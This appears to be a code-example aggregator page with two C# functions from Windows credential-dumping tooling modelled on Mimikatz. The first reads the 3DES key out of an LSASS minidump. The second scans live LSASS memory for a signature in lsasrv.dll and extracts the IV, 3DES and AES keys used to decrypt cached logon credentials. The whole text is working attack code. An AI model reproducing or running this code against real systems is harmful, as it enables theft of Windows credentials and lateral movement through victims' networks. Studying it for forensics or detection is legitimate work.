示例#1
0
        public static byte[] get_des_key(Program.MiniDump minidump, long pos, lsaTemplate_NT6.LsaTemplate_NT6 template)
        {
            ///Console.WriteLine("Acquireing DES key...");
            long offset = (pos + template.key_pattern.offset_to_DES_key_ptr);
            long ptr_iv = (long)Helpers.get_ptr_with_offset(minidump.fileBinaryReader, (long)offset, minidump.sysinfo);

            minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);
            ptr_iv = (long)Minidump.Helpers.ReadUInt64(minidump.fileBinaryReader);

            ptr_iv = Helpers.Rva2offset(minidump, ptr_iv);

            minidump.fileBinaryReader.BaseStream.Seek(ptr_iv, 0);

            byte[] h3DesKeyBytes            = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY)));
            KIWI_BCRYPT_HANDLE_KEY h3DesKey = Helpers.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);

            byte[]            extracted3DesKeyByte = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81)));
            KIWI_BCRYPT_KEY81 extracted3DesKey     = Helpers.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);

            return(extracted3DesKey.hardkey.data.Take(24).ToArray());
        }
示例#2
0
        private int FindKeys(IntPtr hLsass, IntPtr lsasrvMem, OSVersionHelper oshelper)
        {
            long keySigOffset = 0;
            long ivOffset = 0;
            long desOffset = 0, aesOffset = 0;
            KIWI_BCRYPT_HANDLE_KEY h3DesKey = new KIWI_BCRYPT_HANDLE_KEY();
            KIWI_BCRYPT_HANDLE_KEY hAesKey = new KIWI_BCRYPT_HANDLE_KEY();
            KIWI_BCRYPT_KEY81      extracted3DesKey, extractedAesKey;
            IntPtr keyPointer = IntPtr.Zero;

            // Search for AES/3Des/IV signature within lsasrv.dll and grab the offset
            keySigOffset = (long)Utility.OffsetFromSign("lsasrv.dll", oshelper.keyIVSig, max_search_size);
            if (keySigOffset == 0)
            {
                Console.WriteLine("[x] Error: Could not find offset to AES/3Des/IV keys\n");
                return(1);
            }

            // Retrieve offset to InitializationVector address due to "lea reg, [InitializationVector]" instruction
            IntPtr tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET);

            byte[] ivOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            ivOffset = BitConverter.ToInt32(ivOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.IV_OFFSET + 4 + (int)ivOffset);

            // Read InitializationVector (16 bytes)
            this.iv = Utility.ReadFromLsass(ref hLsass, tmp_p, 16);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET);

            // Retrieve offset to h3DesKey address due to "lea reg, [h3DesKey]" instruction
            byte[] desOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            desOffset = BitConverter.ToInt32(desOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.DES_OFFSET + 4 + (int)desOffset);

            // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            byte[] keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            long   keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] h3DesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
            h3DesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(h3DesKeyBytes);

            // Read in the 3DES key
            byte[] extracted3DesKeyByte = Utility.ReadFromLsass(ref hLsass, h3DesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
            extracted3DesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extracted3DesKeyByte);

            this.deskey = extracted3DesKey.hardkey.data;

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET);

            // Retrieve offset to hAesKey address due to "lea reg, [hAesKey]" instruction
            byte[] aesOffsetBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 4);
            aesOffset = BitConverter.ToUInt32(aesOffsetBytes, 0);

            tmp_p = IntPtr.Add(lsasrvMem, (int)keySigOffset + (int)oshelper.AES_OFFSET + 4 + (int)aesOffset);

            // Retrieve pointer to h3DesKey which is actually a pointer to KIWI_BCRYPT_HANDLE_KEY struct
            keyPointerBytes = Utility.ReadFromLsass(ref hLsass, tmp_p, 8);
            keyPointerInt   = BitConverter.ToInt64(keyPointerBytes, 0);

            // Read the KIWI_BCRYPT_HANDLE_KEY struct from lsass
            byte[] hAesKeyBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(keyPointerInt), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_HANDLE_KEY))));
            hAesKey = Utility.ReadStruct <KIWI_BCRYPT_HANDLE_KEY>(hAesKeyBytes);

            // Read in AES key
            byte[] extractedAesKeyBytes = Utility.ReadFromLsass(ref hLsass, hAesKey.key, Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_BCRYPT_KEY81))));
            extractedAesKey = Utility.ReadStruct <KIWI_BCRYPT_KEY81>(extractedAesKeyBytes);

            this.aeskey = extractedAesKey.hardkey.data;

            return(0);
        }